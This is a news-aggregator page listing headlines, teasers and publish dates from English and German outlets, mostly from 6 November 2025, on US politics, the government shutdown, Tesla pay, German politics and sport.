Jeremy Renner is continuing his recovery after his devastating snowplow accident in January, and recognizing those who've helped him along the way.

Article link

Date of publish: Sun, 16 Apr 2023 19:04:10 GMT

Review: 'Barry' takes a whack at its farewell season

"Barry" has taken chances from the very beginning, which is certainly true of a fourth and final season that picks up where the third left off, with its hitman-turned-wannabe actor getting arrested. That paves the way for an even darker season that accentuates the show's ensemble aspect while leaning a little too heavily on blurring lines with flights of fancy.

Article link

Date of publish: Fri, 14 Apr 2023 12:33:08 GMT

NYT > Top Stories

Tesla Investors Back Musk’s Trillion Dollar Payday

Shareholders approved a plan to grant Mr. Musk shares worth nearly $1 trillion if he meets ambitious goals, including vastly expanding the company’s stock market valuation.

Article link

Date of publish: Thu, 06 Nov 2025 22:56:11 +0000

Judge Orders Trump Administration to Fully Fund SNAP Benefits This Month

The Justice Department later said it would appeal, leaving the program known as SNAP in limbo.

Article link

Date of publish: Thu, 06 Nov 2025 22:56:18 +0000

Here Are Airports That Could Be Affected by the Air Traffic Slowdown

The cuts to flights are expected to begin Friday and deepen over the weekend to reach a 10 percent reduction in air traffic.

Article link

Date of publish: Thu, 06 Nov 2025 19:56:48 +0000

What Travelers Need to Know About the Shutdown, Flight Reductions and Delays

As the government shutdown continues, more challenges await passengers as they deal with the newest announcement from the Trump administration: a 10 percent cut in flights at 40 U.S. airports.

Article link

Date of publish: Thu, 06 Nov 2025 23:06:51 +0000

Supreme Court Clears Way for Trump Transgender Passport Policy

A lower court judge had temporarily blocked the administration’s policy requiring that passports reflect sex as found on an original birth certificate.

Article link

Date of publish: Thu, 06 Nov 2025 21:46:18 +0000

Trump Team Now Claims Its Trillions in Tariff Revenue Are ‘Incidental’

In arguments before the Supreme Court, the White House backed away from its claims that President Trump’s tariffs were about raising revenue.

Article link

Date of publish: Thu, 06 Nov 2025 19:51:56 +0000

Key Questions From Conservative Justices in the Tariffs Case

A lively argument spanning almost three hours featured illuminating exchanges that tested the usual commitments of some of the justices on the right side of the court.

Article link

Date of publish: Thu, 06 Nov 2025 21:44:44 +0000

Justice Dept. Is Said to Be Investigating D.C. Mayor Over Foreign Trip

The investigation into Muriel E. Bowser, which is being handled by the U.S. attorney’s office in Washington, could face significant hurdles because of the known facts of the case and recent turmoil inside the Justice Department.

Article link

Date of publish: Thu, 06 Nov 2025 22:20:00 +0000

Judy Garland’s ‘Lucky Jacket’ Returns to Carnegie Hall

She wore it at Carnegie Hall on “the greatest evening in show-business history.” Now the jacket that got away is coming home.

Article link

Date of publish: Thu, 06 Nov 2025 16:00:18 +0000

Challenging Trump, Pelosi Made History

The first and only woman to be speaker of the House also was the most powerful and prominent woman in Washington to effectively confront President Trump.

Article link

Date of publish: Thu, 06 Nov 2025 19:31:58 +0000

Who Will Replace Nancy Pelosi in Congress?

Two Democrats have already announced their campaigns to replace Representative Nancy Pelosi in her San Francisco district, and others may join the race soon.

Article link

Date of publish: Thu, 06 Nov 2025 23:12:12 +0000

Republicans Retire Pelosi as a Villain, and Turn to Mamdani

Searching for another liberal boogeyman, Republicans have zeroed in on Zohran Mamdani. Whether their strategy will work in the midterms is less clear.

Article link

Date of publish: Thu, 06 Nov 2025 20:16:20 +0000

U.S. Sends Attack Aircraft to El Salvador Amid Regional Troop Buildup

A New York Times analysis of satellite imagery and air traffic control communications found that U.S. military planes began operating out of the Central American country in mid-October.

Article link

Date of publish: Thu, 06 Nov 2025 23:05:16 +0000

Stefanik to Launch Campaign to Challenge Gov. Hochul in New York

Elise Stefanik, a Republican congresswoman, is a leading ally of President Trump who has gone to great lengths to criticize Ms. Hochul and Mayor-elect Zohran Mamdani.

Article link

Date of publish: Thu, 06 Nov 2025 22:59:57 +0000

Mamdani Allies Create a Nonprofit to Push His Affordability Agenda

A new group will solicit donations to replicate Zohran Mamdani’s grass-roots army of volunteers and to help build momentum for his proposals.

Article link

Date of publish: Thu, 06 Nov 2025 21:49:24 +0000

When Will Zohran Mamdani Be Sworn In as NYC Mayor?

Zohran Mamdani will take charge just after midnight on Jan. 1, 2026, as required by city law. A swearing-in ceremony will follow soon after.

Article link

Date of publish: Thu, 06 Nov 2025 20:45:31 +0000

Trump Officials Accused of Bullying Tactics to Kill a Climate Measure

Nations were poised to approve the first fee on pollution from ships. That’s when the Trump administration began the threats.

Article link

Date of publish: Thu, 06 Nov 2025 20:36:17 +0000

COP30 Begins With U.S. Allies and Rivals Alike Calling for Action

The calls for action on opening day stood in sharp contrast to the position of the President Trump, who has called global warming a “con job.”

Article link

Date of publish: Thu, 06 Nov 2025 22:29:39 +0000

Lula Hitches a Ride to the COP30 Climate Talks in a Chinese E.V.

The climate-friendly ride, part of a fleet assembled to shuttle delegations to the gathering in Brazil, sent a clear signal: China is making inroads in Latin America.

Article link

Date of publish: Thu, 06 Nov 2025 19:45:53 +0000

Trump Announces Deal to Drop Obesity Drug Prices to as Little as $149 a Month

President Trump announced a deal with Eli Lilly and Novo Nordisk to lower prices on hugely popular weight-loss drugs for Medicare, Medicaid and American patients who pay with their own money.

Article link

Date of publish: Thu, 06 Nov 2025 22:57:21 +0000

What Trump’s New Drug Pricing Deal Means for People With Obesity

The president’s agreement with drug companies involves a range of prices, depending on dose, product and how you’re paying.

Article link

Date of publish: Thu, 06 Nov 2025 21:53:59 +0000

Big Food’s Fight Against Kennedy Is Heating Up

A new industry group wants to set aside the piecemeal state-by-state approach imposing food dye and labeling laws in favor of federal control. The opposition has roiled the MAHA coalition.

Article link

Date of publish: Thu, 06 Nov 2025 12:59:57 +0000

Sexual Assault of the President Exposes Mexico’s Endemic Machismo

President Claudia Sheinbaum was groped on the street this week, in an episode that set off a national conversation about what has and has not changed since Mexico elected its first female leader.

Article link

Date of publish: Thu, 06 Nov 2025 21:06:05 +0000

Egypt’s Grand Museum Is Finally Open. Now, ‘We Need Our Stuff Back.’

The museum’s most anticipated exhibit is the full 5,500 items from King Tutankhamen’s tomb. Egyptians say it’s time to experience their most precious antiquities at home.

Article link

Date of publish: Thu, 06 Nov 2025 20:27:28 +0000

AR-15 Ammunition at a Crime Scene? Good Odds This Army Plant Made It.

Popular AR-15 ammunition made at an Army-owned facility was far more likely than any other to turn up in a government database tracking evidence from gun crimes, new data shows.

Article link

Date of publish: Thu, 06 Nov 2025 18:24:37 +0000

How ‘The Office’ Memes Became the Language of the Internet

Oh my God, OK, it’s happening! From social-media posters to the F.C.C. chair, we are all living in Michael Scott’s world.

Article link

Date of publish: Thu, 06 Nov 2025 18:15:13 +0000

Nancy Pelosi Retires as a Master of Congress

She’ll rightly be lionized as the first woman speaker, but in one sense, that was the most incidental of her myriad accomplishments.

Article link

Date of publish: Thu, 06 Nov 2025 21:00:14 +0000

Did Liberal Feminism Ruin the Workplace?

And if so, can conservative feminism fix it?

Article link

Date of publish: Thu, 06 Nov 2025 15:06:27 +0000

Jury Awards $10 Million to Abigail Zwerner, Teacher Shot by 6-Year-Old Student

The teacher, Abigail Zwerner, was shot in the hand and chest by a first grade student who brought his mother’s gun to class in 2023.

Article link

Date of publish: Thu, 06 Nov 2025 23:19:06 +0000

Britain Faces Up to Tough Economic Choices. Finally, Economists Say.

The central bank held interest rates steady on Thursday, a decision that came at a time when British policymakers and lawmakers are confronting economic challenges.

Article link

Date of publish: Thu, 06 Nov 2025 20:19:09 +0000

NTSB Sifts Through UPS Louisville Plane Crash Wreckage

The UPS aircraft’s voice and data recorders were recovered and could provide insights into what happened before and during the crash, which killed at least 13 people.

Article link

Date of publish: Thu, 06 Nov 2025 23:20:07 +0000

German News

News sites below.

DER SPIEGEL - Schlagzeilen – Tops

Elon Musk: Tesla-Aktionäre machen Weg frei für riesiges Aktienpaket

Techmilliardär Elon Musk kann auf eine Vergütung von bis zu einer Billion Dollar hoffen. Die Aktionäre seines Elektroautokonzerns Tesla billigten ein entsprechendes Paket – unter gewissen Bedingungen.

Article link

Date of publish: Thu, 6 Nov 2025 23:19:00 +0100

Shutdown: US-Regierung um Donald Trump muss Lebensmittelhilfen finanzieren

Millionen Amerikanern droht der Wegfall ihrer Lebensmittelhilfe, schuld ist die Haushaltssperre. Doch nun schreitet ein Richter ein – um »irreparablen Schaden« zu verhindern.

Article link

Date of publish: Fri, 7 Nov 2025 00:17:00 +0100

Ampel-Koalition: Ein Jahr nach dem Bruch - Koordinatoren ziehen Bilanz

Sie mussten eine Koalition organisieren, die kaum zusammenpasste: Ein Jahr nach dem Ampel-Aus sprechen der SPD-Mann Wolfgang Schmidt, die Grüne Anja Hajduk und der Liberale Steffen Saebisch über eigene Fehler. Und über Olaf Scholz.

Article link

Date of publish: Thu, 6 Nov 2025 17:51:00 +0100

Nachrichten - WELT

„BSW wird kein Mehrheitsbeschaffer für Anti-AfD-Regierung sein“

Das BSW ist im Umbruch, und der könnte auch die Vorsitzende Sahra Wagenknecht treffen. Generalsekretär Christian Leye gilt als ihr wichtigster Mitstreiter. Im Interview sagt er, wie die Partei in ihre „neue Phase“ steuert – und wie sie in den Bundesländern mit der AfD umgeht.

Article link

Date of publish: Thu, 06 Nov 2025 23:10:35 GMT

El Khannouss und Undav retten VfB Stuttgart mit späten Toren

Der VfB Stuttgart drohte mit einem torlosen Remis in der Europa League weiter unter Druck zu geraten. Doch späte Tore lassen den Pokalsieger doch noch jubeln.

Article link

Date of publish: Thu, 06 Nov 2025 22:29:16 GMT

Sie kämpften für die Ukraine – Russland verurteilt Kolumbianer zu 13 Jahren Haft

Von den Propagandakanälen wurde die Szene offenbar schnell gelöscht: Bei einem Auftritt in Moskau trifft Kremlchef Putin auf ein Mädchen. Es berichtet von seinem „Onkel an der Front“. Gleichzeitig verurteilt Russland zwei Kolumbianer zu 13 Jahren Haft. Mehr im Liveticker.

Article link

Date of publish: Thu, 06 Nov 2025 22:18:00 GMT

Nachrichten: DIE ZEIT Newsfeed

Snap: US-Richter ordnet vollständige Finanzierung von Lebensmittelhilfen an

Die US-Regierung will im November lediglich Geld für etwa zwei Drittel der Lebensmittelhilfe bereitstellen. Ein Richter aus Rhode Island hält das für unzulässig.

Article link

Date of publish: Thu, 06 Nov 2025 22:53:26 -0000

Wintersport: Russland klagt gegen Ausschluss von Olympischen Winterspielen 2026

Als neutrale Athleten durften Russen bisher weiterhin bei Olympia antreten. Ein Wintersportverband verbot ihnen nun aber die Qualifikation. Russland will dagegen klagen.

Article link

Date of publish: Thu, 06 Nov 2025 22:44:08 -0000

Geschlechtsidentität: Supreme Court erlaubt Einschränkung der Geschlechtsauswahl im US-Pass

Donald Trump darf Maßnahmen umsetzen, die es trans und nicht binären Menschen verwehrt, ihr Geschlecht im Reisepass anzugeben. Das entschied der Oberste Gerichtshof.

Article link

Date of publish: Thu, 06 Nov 2025 22:26:47 -0000

netzpolitik.org

Digitaler Euro: Während das Parlament streitet, geht die Entwicklung weiter

Navarrete an einem Rednerpult, im Hintergrund Flaggen von EU-Ländern
Navarrete hätte den digitalen Euro am liebsten nur als Offline-Variante. – Alle Rechte vorbehalten European Union 2025 – Source : EP, Genevieve Engel
Das Europäische Parlament ist sich beim Digitalen Euro nicht einig. Der zuständige Berichterstatter will zunächst eine reine Offline-Lösung, progressive Fraktionen sehen das ganz anders. Währenddessen treibt die Zentralbank die Umsetzung weiter voran.

Article link

Date of publish: Thu, 06 Nov 2025 16:56:29 +0000

Digitaler Omnibus: EU-Kommission strebt offenbar Kahlschlag beim Datenschutz an

Eine Axt mit Holzstiel steckt in einem Baum
Reform mit der Axt: Die EU-Kommission plant anscheinend massive Einschnitte beim Datenschutz. – Gemeinfrei-ähnlich freigegeben durch unsplash.com David Popkov
Freifahrtschein für KI-Training, weniger Schutz für pseudonymisierte und sensible Daten, Beschneidung von Betroffenenrechten: Es verdichten sich die Hinweise, dass die EU-Kommission einen Frontalangriff auf die DSGVO plant. Auch die Bundesregierung fordert dahingehend Einschnitte, wie ein Dokument belegt, das wir veröffentlichen.

Article link

Date of publish: Thu, 06 Nov 2025 14:44:34 +0000

Elektronische Patientenakte: Bundestag beschließt doppelte Rolle rückwärts

Der vitruvianische Mensch von Leonardo da Vinci als Röntgenbild
Wie viele ihrer Gesundheitsdaten müssen Versicherte preisgeben? – Alle Rechte vorbehalten IMAGO / Design Pics
Der Bundestag hat mit den Stimmen von Schwarz-Rot zwei Änderungen bei der elektronischen Patientenakte beschlossen. Das Echo darüber fällt geteilt aus: Einerseits wird die Rückkehr zu mehr Datenhoheit vorsichtig begrüßt, andererseits werden gesenkte Sicherheitsstandards kritisiert.

Article link

Date of publish: Thu, 06 Nov 2025 14:35:04 +0000

Golem.de

Scharfe Kritik an Pistorius: Milliardenprojekt Digitalfunk funktioniert im Leopard nicht

Der Verteidigungsminister kommt wegen der seit Jahren misslingenden Digitalisierung des Bundeswehrfunks unter Druck. Nun sollen es Consultants für rund 160 Millionen Euro lösen. (Funkgerät, Politik)

Article link

Date of publish: Fri, 07 Nov 2025 00:01:01 +0100

Rockstar Games: GTA 6 erneut verschoben

Lucia und Jason müssen sich weiter gedulden: Rockstar hat den Start von GTA 6 auf November 2026 verschoben - sehr zum Ärger vieler Fans. (GTA 6, Take-Two)

Article link

Date of publish: Thu, 06 Nov 2025 22:41:02 +0100

Petition: Palantir des Faschisten Thiel "kein Partner" Deutschlands

Vor dem Stuttgarter Landtag hat Sebastian Müller vom CCC die Petition gegen Palantir vorgestellt. Die USA würden zum Systemrivalen. (Palantir, Datenschutz)

Article link

Date of publish: Thu, 06 Nov 2025 22:37:01 +0100

DER SPIEGEL - Schlagzeilen – Tops

Elon Musk: Tesla-Aktionäre machen Weg frei für riesiges Aktienpaket

Techmilliardär Elon Musk kann auf eine Vergütung von bis zu einer Billion Dollar hoffen. Die Aktionäre seines Elektroautokonzerns Tesla billigten ein entsprechendes Paket – unter gewissen Bedingungen.

Article link

Date of publish: Thu, 6 Nov 2025 23:19:00 +0100

Shutdown: US-Regierung um Donald Trump muss Lebensmittelhilfen finanzieren

Millionen Amerikanern droht der Wegfall ihrer Lebensmittelhilfe, schuld ist die Haushaltssperre. Doch nun schreitet ein Richter ein – um »irreparablen Schaden« zu verhindern.

Article link

Date of publish: Fri, 7 Nov 2025 00:17:00 +0100

Ampel-Koalition: Ein Jahr nach dem Bruch - Koordinatoren ziehen Bilanz

Sie mussten eine Koalition organisieren, die kaum zusammenpasste: Ein Jahr nach dem Ampel-Aus sprechen der SPD-Mann Wolfgang Schmidt, die Grüne Anja Hajduk und der Liberale Steffen Saebisch über eigene Fehler. Und über Olaf Scholz.

Article link

Date of publish: Thu, 6 Nov 2025 17:51:00 +0100

Bundeswehr: Verzögerungen bei der Beschaffung von Kamikazedrohnen

Die Bundeswehr will ihren Rückstand bei Kamikazedrohnen durch eine besonders schnelle Beschaffung bei drei deutschen Herstellern aufholen. Nun zeigt ein internes Dokument: Das läuft nicht wie erhofft.

Article link

Date of publish: Thu, 6 Nov 2025 18:00:00 +0100

Faschir in Sudan: »Die Menschen starben vor unseren Augen«

Nach mehr als 500 Tagen Belagerung haben die RSF-Milizen die sudanesische Stadt Faschir erobert. Hier berichten Überlebende von den Massakern.

Article link

Date of publish: Thu, 6 Nov 2025 19:51:00 +0100

Fall Fabian aus Güstrow: Eine allzu verdächtige Zeugin

Rund vier Wochen nach seinem Verschwinden können die Ermittler im Fall Fabian einen Erfolg verkünden. Tatverdächtig ist eine Frau, die den Jungen offenbar kannte.

Article link

Date of publish: Thu, 6 Nov 2025 19:33:00 +0100

Clan-Kriminalität: Die Gomans vor Gericht - SPIEGEL TV

Ob Teppichmasche, Enkeltrick, Geldwäsche oder Sozialbetrug: Teile der Großfamilie Goman geraten seit Jahren regelmäßig mit dem Gesetz in Konflikt. Aktuell laufen diverse Prozesse. Nun packt ein Insider aus.

Article link

Date of publish: Thu, 6 Nov 2025 21:02:00 +0100

Haftbefehl-Doku auf Netflix: Offenbach liebt den Rapper jetzt noch mehr

Drogen, Klinik, Depressionen: Selten hat sich ein Künstler so verletzlich vor einer Kamera gezeigt wie Aykut Anhan, besser bekannt als Haftbefehl. Wie schauen seine einstigen Nachbarn auf den berühmtesten Sohn der Stadt?

Article link

Date of publish: Thu, 6 Nov 2025 20:22:00 +0100

Die Linke: Clara Bünger scheitert bei Wahl fürs Geheimdienstkontrollgremium

Erneut sind es wohl Unionsstimmen, die der Linken einen Sitz im Parlamentarischen Kontrollgremium versagen – dabei war die Kandidatin dieses Mal handverlesen. Die Fronten zwischen den Parteien dürften sich weiter verhärten.

Article link

Date of publish: Thu, 6 Nov 2025 18:45:00 +0100

Nationalmannschaft: Welches DFB-Trikot ist Ihr Favorit? Stimmen Sie ab!

Der DFB hat sein neues Heimtrikot für die WM präsentiert – und es weckt einige Emotionen. Das hat bereits Tradition: Hier ist eine Auswahl aller Trikots der deutschen Nationalelf. Was ist Ihr Lieblingsjersey?

Article link

Date of publish: Thu, 6 Nov 2025 18:49:00 +0100

NFL – Dallas Cowboys: Marshawn Kneeland stirbt Tage nach seinem ersten Touchdown

Marshawn Kneeland spielte für die Dallas Cowboys in der NFL, gerade erst erzielte der Footballstar seinen ersten Touchdown. Wenige Tage später haben Beamte nach einer Verfolgungsjagd seine Leiche gefunden.

Article link

Date of publish: Thu, 6 Nov 2025 19:28:00 +0100

Römisches Reich: Forscher veröffentlichen eine Art Google Maps für das Imperium

Ein Forschungsteam hat rekonstruiert, wo die Straßen im Römischen Reich verliefen. Interessierte können das 300.000-Kilometer-Netz online selbst erkunden – Routenplaner inklusive.

Article link

Date of publish: Thu, 6 Nov 2025 17:13:00 +0100

Kuriose Polizeieinsätze: Stopp, Verkehr-Kontrolle!

Die Polizei stoppt ein Paar, das Sex bei Tempo 140 hat. Es ist nicht die erste schnelle Nummer, bei der die Behörden einschreiten. Ein Überblick der speziellen »Verkehrs«-Meldungen.

Article link

Date of publish: Thu, 6 Nov 2025 19:02:00 +0100

Marisa Burger spricht über ihren Abschied von »Die Rosenheim-Cops«

Fast ein Vierteljahrhundert lang spielte Marisa Burger die Sekretärin Miriam Stockl in der ZDF-Krimiserie »Die Rosenheim-Cops«. Nun feierte sie ihren Abschied – und verrät, was sie vom Set mitgenommen hat.

Article link

Date of publish: Thu, 6 Nov 2025 21:31:00 +0100

Ukraine-Krieg: Angelina Jolie überrascht Ukrainer mit Besuch in Cherson

Inmitten des Kriegs ist Angelina Jolie in die südukrainische Stadt Cherson gereist. Bilder zeigen den Hollywoodstar in schusssicherer Weste, die Menschen vor Ort feiern sie für ihren Mut und ihr Engagement.

Article link

Date of publish: Thu, 6 Nov 2025 21:44:00 +0100

Seitensprung in langjähriger Ehe: Hilft Fremdgehen wirklich bei Alltagsproblemen?

Meine Freundinnen klingen, als hätten sie keine Lust mehr auf ihre langjährigen Beziehungen. Vermutlich ist das Einzige, was da noch hilft: fremdgehen.

Article link

Date of publish: Sun, 2 Nov 2025 05:30:00 +0100

Regenjacken fürs Fahrrad von Craft, Endura, Gripgrab, Gorewear, Gonso, AGU und Vaude im Test

Eine Regenjacke ist ein nützliches Accessoire für Radfahrerinnen und Radfahrer, doch nicht alle haben eine Kapuze oder eine Tasche für das Smartphone. Wir haben zwölf Modelle für Frauen und Männer getestet.

Article link

Date of publish: Sat, 25 Oct 2025 08:58:00 +0200

FC Bayern München: Wie Maxi, 14, für eine Profikarriere trainiert

Maximilian Mahr will Fußballprofi werden. Die Nachwuchsakademie des FC Bayern bietet ihm die besten Voraussetzungen, aber es gibt auch harten Konkurrenzkampf. Kann er der nächste Lennart Karl werden?

Article link

Date of publish: Sat, 1 Nov 2025 11:38:00 +0100

Nachrichten - WELT

„BSW wird kein Mehrheitsbeschaffer für Anti-AfD-Regierung sein“

Das BSW ist im Umbruch, und der könnte auch die Vorsitzende Sahra Wagenknecht treffen. Generalsekretär Christian Leye gilt als ihr wichtigster Mitstreiter. Im Interview sagt er, wie die Partei in ihre „neue Phase“ steuert – und wie sie in den Bundesländern mit der AfD umgeht.

Article link

Date of publish: Thu, 06 Nov 2025 23:10:35 GMT

El Khannouss und Undav retten VfB Stuttgart mit späten Toren

Der VfB Stuttgart drohte mit einem torlosen Remis in der Europa League weiter unter Druck zu geraten. Doch späte Tore lassen den Pokalsieger doch noch jubeln.

Article link

Date of publish: Thu, 06 Nov 2025 22:29:16 GMT

Sie kämpften für die Ukraine – Russland verurteilt Kolumbianer zu 13 Jahren Haft

Von den Propagandakanälen wurde die Szene offenbar schnell gelöscht: Bei einem Auftritt in Moskau trifft Kremlchef Putin auf ein Mädchen. Es berichtet von seinem „Onkel an der Front“. Gleichzeitig verurteilt Russland zwei Kolumbianer zu 13 Jahren Haft. Mehr im Liveticker.

Article link

Date of publish: Thu, 06 Nov 2025 22:18:00 GMT

Elon Musk bekommt Aussicht auf Riesen-Aktienpaket im Wert von einer Billion Dollar

Der reichste Mensch der Welt könnte noch eine Billion Dollar reicher werden. Die Tesla-Aktionäre stimmten für einen beispiellosen Vergütungsplan für Elon Musk. Dafür müssen aber vier Bedingungen erfüllt sein.

Article link

Date of publish: Thu, 06 Nov 2025 22:05:03 GMT

„Es tut uns leid“ – Rockstar Games muss „GTA VI“ deutlich nach hinten verschieben

Eigentlich sollte „Grand Theft Auto VI“ l im Mai 2026 veröffentlicht werden. Doch nun muss Rockstar Games den Release erneut verschieben. Gleichzeitig entbrennt im Studio ein Streit um die Entlassung von Dutzenden Mitarbeitern.

Article link

Date of publish: Thu, 06 Nov 2025 22:02:37 GMT

Mainz schockt Italiener – Last-Minute-Sieg gegen AC Florenz

Mainz 05 schafft in der Conference League einen späten Sieg und schüttelt gegen die AC Florenz die Krise der Bundesliga ab. Im Duell mit den Italienern zeigt der FSV Comeback-Qualitäten.

Article link

Date of publish: Thu, 06 Nov 2025 20:56:00 GMT

Sieg in Nizza – Freiburg in Europa auf Kurs K.o.-Phase

Am Anfang tut der SC Freiburg sich in Nizza noch schwer – doch dann dreht der Fußball-Bundesligist das Spiel. Die Franzosen offenbaren ohne Routinier Dante Defensivschwächen.

Article link

Date of publish: Thu, 06 Nov 2025 20:30:32 GMT

Drama im Oval Office – Mann bricht direkt neben Trump zusammen

Trump lädt zu einem Termin mit Pharmavertretern ins Oval Office. Eigentlich will er niedrigere Preise für Abnehmspritzen verkünden, doch dann sackt plötzlich ein Mann direkt neben dem US-Präsidenten zusammen. Die Pressekonferenz muss unterbrochen werden.

Article link

Date of publish: Thu, 06 Nov 2025 19:58:33 GMT

„Ein Sprengsatz, der in der wahrscheinlich wichtigsten Stadt der Welt gelegt ist“

Publizist Norbert Bolz würdigt Karoline Preisler für ihren Mut gegen Judenhass, analysiert die Zerrissenheit der CDU und diskutiert die Reformfähigkeit des öffentlich-rechtlichen Rundfunks. „Ich sehe für die CDU kaum einen Ausweg“, sagt er bei WELT TV.

Article link

Date of publish: Thu, 06 Nov 2025 19:12:11 GMT

„Allah hat mir befohlen, ein Opfer zu bringen“, sagte der Amokfahrer von Frankreich

Ein Autofahrer rammte mehrere Passanten in Westfrankreich. Nach seiner Festnahme beruft er sich auf „Befehle von Allah“. Die Staatsanwaltschaft prüft nun die Zurechnungsfähigkeit des Mannes. Bei seiner Vernehmung gestand der Amokfahrer, „durch Selbstverbrennung sterben zu wollen“.

Article link

Date of publish: Thu, 06 Nov 2025 19:07:44 GMT

„Großes Risiko, wenn beide Seiten den Kampf um Pokrowsk medial aufblähen“

KI wird zunehmend zur Waffe im Informationskrieg um die Ukraine. Beide Seiten nutzen manipulierte Bilder, um die Kontrolle über die Deutungshoheit zu gewinnen. „Da ist ein großes Risiko dabei, das jetzt im Informationsraum so aufzublasen“, sagt Sicherheitsexperte Nico Lange bei WELT TV.

Article link

Date of publish: Thu, 06 Nov 2025 18:56:30 GMT

„Mein Vorschlag wäre, wir geben jedem, der nicht herreist, ein Elektroauto“

Die Bundesregierung will afghanischen Flüchtlingen Geld anbieten, um auf die Einreise nach Deutschland zu verzichten. WELT-Kolumnist Henryk M. Broder sagt: „Das ist eine unglaubliche Brutalität“.

Article link

Date of publish: Thu, 06 Nov 2025 18:45:57 GMT

Polizei hebt Drogenlabor aus und veröffentlicht Bilder aus dem Inneren

Vor der Aushebung des riesigen Drogenlabors im brandenburgischen Nauen war die Zollfahndung den Tätern ein halbes Jahr auf der Spur. Neu veröffentlichte Fotos zeigen eine Halle in einem Industriegebiet voller verdreckter Wanne und Kanister mit Chemikalien.

Article link

Date of publish: Thu, 06 Nov 2025 18:42:06 GMT

„Parteipolitisches Machtspiel“ – zwei Linke-Politikerinnen scheitern bei Wahl für Bundestags-Gremien

Im Sommer verfehlte schon Linke-Fraktionschefin Reichinnek den Einzug ins Parlamentarische Kontrollgremium. Jetzt ist auch ihre Kollegin Bünger durchgefallen. Der Fraktionschef macht die Union dafür verantwortlich. Auch eine andere Linke-Politiker schafft es nicht in ein Gremium.

Article link

Date of publish: Thu, 06 Nov 2025 17:50:03 GMT

„Von massenweisen Abschiebungen sind wir leider noch weit entfernt“

Nach mehreren Gerichtsurteilen sind Abschiebungen von Syrern nach Einzelfallprüfung möglich. Die Verfahren betreffen meist junge, gesunde Männer. „Es wird weiterhin viele Syrer geben, bei denen die Gerichte Abschiebungen verbieten“, sagt Prof. Daniel Thym, Europa- und Völkerrechtler, bei WELT TV.

Article link

Date of publish: Thu, 06 Nov 2025 17:35:10 GMT

„Ich habe gedacht, da veräppelt mich einer“ – Drei Legenden in „Hall of Fame“ aufgenommen

Die „Hall of Fame“ des deutschen Fußballs wird um drei prominente Mitglieder erweitert. Ein Erfolgstrainer und eine Weltmeisterin werden geehrt. Der dritte Neuzugang zeigt sich völlig überrascht. „Ich habe gedacht, heute kennt mich keiner mehr“, sagt er.

Article link

Date of publish: Thu, 06 Nov 2025 17:24:40 GMT

Union liegt nun wieder vor der AfD

Laut ARD-„Deutschlandtrend“ hat die Union leicht an Zustimmung in der Bevölkerung gewonnen und liegt nun wieder vor der AfD. CDU und CSU kommen in der Umfrage zusammen auf 27 Prozent.

Article link

Date of publish: Thu, 06 Nov 2025 17:24:07 GMT

Weit größer als gedacht – auf diesen Straßen fuhren die Römer durch ihr Reich

Das römische Reich erstreckte sich zeitweise über drei Kontinente. Forscher haben nun das Straßennetz der Römer rekonstruiert, das weitaus größer war als bisher angenommen. Heraus kam eine beeindruckende Karte.

Article link

Date of publish: Thu, 06 Nov 2025 17:12:45 GMT

„Es ging um totale Erniedrigung“ – Deutsche Geisel berichtet von sexuellem Missbrauch durch Hamas

Rom Braslavski verbrachte über zwei Jahre in Geiselhaft im Gaza-Streifen. In einem TV-Interview schildert er unter Tränen, wie er von den Islamisten sexuell missbraucht wurde, um ihn zu erniedrigen. Er sei „dem Teufel“ begegnet.

Article link

Date of publish: Thu, 06 Nov 2025 17:04:23 GMT

Die Pathologisierung der Mitte

Die „Mitte-Studie 2025“, von den meisten Medien kritiklos aufgegriffen, rückt bürgerliche Überzeugungen in die Nähe des Rechtsextremismus. Dabei benutzen die Verfasser einen perfiden Trick.

Article link

Date of publish: Thu, 06 Nov 2025 17:04:03 GMT

„Zionisten sind nicht willkommen“ – Spiel von antiisraelischen Protesten überschattet

Maccabi Tel Aviv gastiert in der Europa League bei Aston Villa. Schon vor dem Spiel kommt es in der Stadt zu massiven Protesten gegen Israel. Die Politik reagiert mit Empörung, die Polizei trifft drastische Vorkehrungen.

Article link

Date of publish: Thu, 06 Nov 2025 16:48:06 GMT

Empörung über „Vaterlandsverräter“ – Jetzt pfeift die AfD ihre Politiker bei Russland-Reise zurück

AfD-Abgeordnete reisen zu einer Konferenz nach Russland. Dort sollte es zu einem hochrangigen Treffen kommen. Doch die Bundestagsfraktion schiebt den Beteiligten zumindest teilweise einen Riegel vor. In anderen Parteien löst die Reise heftige Kritik aus.

Article link

Date of publish: Thu, 06 Nov 2025 16:43:17 GMT

Wie Hamburg Schule neu denkt – zwei Gründungen als Beispiel für den Wandel

Hamburg gründet seit Jahren zu jedem Sommer neue Schulen – um dem Schülerwachstum gerecht zu werden und neue Konzepte einzuführen. Dabei verfolgt jede neue Schule eigene innovativen Ideen. Ob der Weg der richtige ist, werden Lernstandserhebungen in Kürze zeigen.

Article link

Date of publish: Thu, 06 Nov 2025 16:28:08 GMT

Rechtsextremismus im „Graubereich“ – und die fragwürdige Methodik dahinter

Die groß angelegte Mitte-Studie der Friedrich-Ebert-Stiftung bescheinigt einem „Graubereich“ der Gesellschaft eine Offenheit für rechtsextreme Gedanken. Bemerkenswert aber ist, welche Aussagen im Detail bereits als problematisch gelten.

Article link

Date of publish: Thu, 06 Nov 2025 16:26:22 GMT

„Teilweise drastische Appelle“ – Caspar Brockhaus gibt Einblicke vom Stahlgipfel

Beim Stahlgipfel im Kanzleramt diskutierten Politik und Industrie über Wettbewerbsfähigkeit, Energiepreise und Schutz vor Billigimporten. Zumindest beim Strompreis seien sich alle einig, berichtet Caspar Brockhaus, CEO der Brockhaus Group, bei WELT TV.

Article link

Date of publish: Thu, 06 Nov 2025 16:19:00 GMT

„Die Mittelschicht gerät unter Druck“ – und in deutschen Wohnungen wird es immer enger

Die Mieten insbesondere in Großstädten steigen schneller, gleichzeitig wächst die Zahl der Mieterhaushalte. Beides zusammen führt zu beengten Verhältnissen. Fast jeder fünfte Haushalt hat zu wenig Platz. Familien sind besonders betroffen.

Article link

Date of publish: Thu, 06 Nov 2025 16:18:57 GMT

Rheinmetall verbucht einen Rekord nach dem anderen – Konzernchef rechnet mit Auftragsflut

Geschäftszahlen von Rheinmetall kannten in den vergangenen Jahren nur eine Richtung: Es ging nach oben. So soll es auch bis weit ins kommende Jahr weitergehen. Doch es gibt einen Grund, der die Stimmung in der Waffenschmiede etwas trübt.

Article link

Date of publish: Thu, 06 Nov 2025 16:05:24 GMT

Der Protektionismus verändert die Handelsrouten

